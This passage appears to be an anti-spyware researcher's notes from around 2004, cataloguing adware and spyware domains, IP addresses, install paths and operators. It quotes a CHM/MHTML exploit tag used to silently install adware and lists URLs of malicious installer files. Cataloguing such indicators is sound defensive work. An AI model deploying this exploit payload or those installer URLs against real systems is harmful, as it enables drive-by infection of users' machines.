69.56.139.2  celebrity-portal.com
sport-gallery.com:207.44.136.91 (lie teng)
lyricscollection.com:207.44.136.91  at-games
videogamesmania.com:207.44.136.91
alwayscollections.com:207.44.136.91
celebrity-image.com:207.44.136.91 
movies-studio.com:207.44.136.91
pda-palm.com:207.44.136.91 (ip opens to the pda-palm.com site)

syspage.com:203.199.200.61
**
koolpages.com:66.250.172.122

searchboxxx.com:216.87.71.20
203.199.200.61/xp2/install.php
203.199.200.61/xp2/redir.php
203.199.200.61/xp2/sysupd.cab
ip addresses belong to syspage.com:203.199.200.61

files from: idownload.com:216.130.187.146
isearch.com:216.130.187.150
auto.isearch.com:216.130.187.150
search results:
isearch.i-lookup.com:216.130.188.217
aztec marketing s.a.
i-lookup.com:216.130.188.210
this is a virtumundo install.
virtumundo.com:216.64.206.75
installs in the windows\downloaded program files and the root of c:\
clsid:1c78ab3f-a857-482e-80c0-3a1e5238a565" codebase="c:\install.cab
it then runs the vminstaller.exe and installs the vm.exe.

the internetantispy.com:208.48.15.13 when loaded installs the adware instealth.
this is in a folder in the temp and the vminstaller.exe is loaded as a process.
o4 - hkcu\..\runonce: [ms setup] 
c:\docume~1\admini~1\locals~1\temp\icd1.tmp\vminstaller.exe
this will set everything up at reboot.


207.159.133.34 xposed.com (possible windows chm exploit by passthison.com thru a 
rotational ad server in their sites pages...adult to porn content site) 

***********************************************************
sites using exploits - dangerous!!!
known windows chm help exploit using the windows media player
***********************************************************


loud marketing cdt inc.
bridge.dll is a new adware program that stealth-downloads and runs on system startup. 
it 
acts as a search page hijacker taking you to one of four possible servers. this may be 
a 
variant of searchbarcash but at the time of this writing, little detail is available

pestpatrol.com/pestinfo/l/loudmarketing.asp

69.28.208.77 scanspyware.com
69.28.208.77 flingstone.com
69.28.208.77 skoobidoo.com
69.28.208.77 searchbrowser.com
69.28.208.77 cdtnet.net
69.90.178.11 blazefind.com
69.90.178.10 searchbarcash.com
69.28.208.77 public.searchbarcash.com
69.28.208.71 

69.28.208.77 my-internet.info 
69.28.208.77 imashare.com 

69.90.178.10
loudcash.com
madecards.com
radiopranks.com
searchbarcash.com
starpranks.com

69.90.178.11 
americandaytrading.com
blazefind.com
canadiandaytrader.com
canadiandaytrading.com
cdtnet.net
embossoul.com
flashtabloid.com
flashtabloids.com
flingstone.com
freshjulz.com
has-a-small-dick.com
has-tiny-tits.com
homepagecash.com
internetcleanerpro.com
is-a-dickhead.com
is-a-porn-star.com
is-a-pornstar.com
is-a-pussy.com
is-a-queer.com
kickasscards.com
mad-ecards.com
martyspics.com
maximxxx.com
needs-privacy.com
needs-sex.com
payperfeed.com
scanspyware.com
searchbrowser.com
servicesmro.com
skoobidoo.com
smediaworld.com
starprank.com
troffee.com
upstepcrew.com
winadclient.com
windowssr.com
windupdates.com

69.90.178.200
stephanie.cdtnet.net
mail.loudmarketing.com




209.50.252.95/si2//si2.exe code had the following in it: 
www2.flingstone.com/softwares/famous.exe: this went to blazefind search page
this is one of the files used in the chm windows help file exploits used by the ip 
209.50.252.95 which belongs to passthison.com
66.150.2.83 msxml.vpptechnologies.com (infospace/go2net inc.)
66.150.2.71 clickit.go2net.com
66.150.2.101 go2net.com (infospace)
206.29.192.200 infospace.com
208.254.18.136 static.vpptechnologies.com
206.29.192.200 main.vpptechnologies.com
main.vpptechnologies.com (links go to this) ping and found infospace.com owns the ip
pinging infospace.com [206.29.192.200] with 32 bytes of data:
reply from 63.251.162.218: destination net unreachable.


209.50.251.164 server224.smartbotpro.net


this is the code returned from 209.50.252.95/si2/presi2.htm?from-si that then runs the 
exploit which will then overwrite the windows media player and start installing the 
flingstone bridge.dll adware...
<object data="&#109;s-its:mhtml:file://c:\foo.mht!${path}/si2.chm::/si2.htm" 
type="text/x-scriptlet"></object> 


smartbotpro.net 205.236.189.50
mcpromotions.com 209.217.54.210 
server224.smartbotpro.net 209.50.251.164
passthison.com 209.50.251.195
on 6/4/2004 (passthison.com but the exploit files are live)
"due to new laws being enacted and controversy surrounding our 
business model,we have voluntarily decided to implement the cease 
of all current business practices by the end of june 2004."


69.59.138.155 spykillerpro.com 
69.90.87.2 downloads.default-homepage-network.com
default-homepage-network.com 
69.36.129.75
69.36.129.71
69.36.129.70
69.36.129.69
69.36.129.67
209.50.251.164 server224.smartbotpro.net
208.237.254.40 7search.com (in exploit code)
208.237.254.18 impression.7search.com
208.237.254.40 img.7search.com
208.237.254.7 pay-per-search.com
208.237.254.111 emergency24.com
208.237.254.23 tracking.roispy.com
208.237.254.23 roispy.com
208.237.254.7 payperranking.com 
64.27.100.65 media.popuptraffic.com
64.27.100.126 undergroundlair.net
64.49.221.101 findit-quick.com
64.70.4.98 thecoolbar.com
64.106.147.30 search.turbofind.com (standardinternet.com)
65.17.198.120 adtrak.net (standardinternet.com)
65.17.234.100 belgiandip.com
66.115.134.160 national-net.com (hosts porn and exploiters)
66.115.153.38bruggenet.net
66.150.8.147 c.enhance.com
66.230.164.190 lookfindgo.com (uses 66.230.129.74 isprime.com dns server)
66.250.172.10 ns1.dcomm.com
66.250.172.49 cash-advance-site.com (d communications inc. s.a.)
66.250.172.51 freehomepages.com
66.250.172.106 inet-traffic.com
66.250.172.118 homepagez.com 
66.250.172.122 koolpages.com 
66.250.172.124 cybcity.com 
66.250.172.125 cybamall.com
66.250.172.127 cyberturf.com 
66.250.172.129 megaone.com
66.250.172.151 searchit.com
66.70.16.150 clickthrutraffic.com
66.70.20.50 standardinternet.com
66.70.21.80 popuptraffic.com (standardinternet.com)
66.70.68.147 turbofind.com
66.70.68.254 datapipe.net
69.28.208.77 flingstone.com (6/11/04 wmplayer.exe.tmp 4kb code shows flingstone.com)
66.98.142.97 picturesfreepics.com 
66.98.142.97 condorinvestigations.com
69.56.221.186 alwaysgirls.com 
207.44.212.67 247-1.net
207.44.212.67 themansearch.com
209.50.251.175 searchtraffic.com (standardinternet.com)
209.50.251.209 clickheretofind.com (standardinternet.com)
209.50.251.211 mojosearch.com (standardinternet.com)
(calls searchtraffic.com and redirects to turbofind.com)
209.50.251.242 bulkclicks.com
216.12.133.68 bidclix.net
216.180.241.194 247-host.com
(links to 66.98.142.97 picturesfreepics.com) also uses cws 66.230.164.190 
lookfindgo.com

65.17.207.40 65.17.207.40/framepb_1u.php (owned by datapipe) this is part
of an chm exploit

216.250.141.189 enhance.com 
belgiandip.com/go.php calls in its code:
undergroundlair.net/adjs.php
undergroundlair.net/adclick.php 

carima enterprises limited
66.98.226.25 portalone.hostance.com
66.98.226.25 hostance.com 
***********
64.255.161.210 ctc.amateurpages.com 
66.230.144.6 trafficjuicer.com

208.237.254.7 emergency24.com
208.237.254.7 watch24.com
208.237.254.7 payperranking.com
208.237.254.7 pay-per-search.com
208.237.254.40 7search.com
208.237.254.23 roispy.com
208.237.254.23 tracking.roispy.com
208.237.254.122 accessoryad.com

**********************
comments
**********************
the blackstonedata was one of the first to become infamous for the first transponder 
variant" iehelp.dll and the domain names were later under the ownership of lop.com 
until a few months ago when both expired and now are for sale. for historical purposes 
and as both names were owned by 2 of the most dangerous adware groups on the i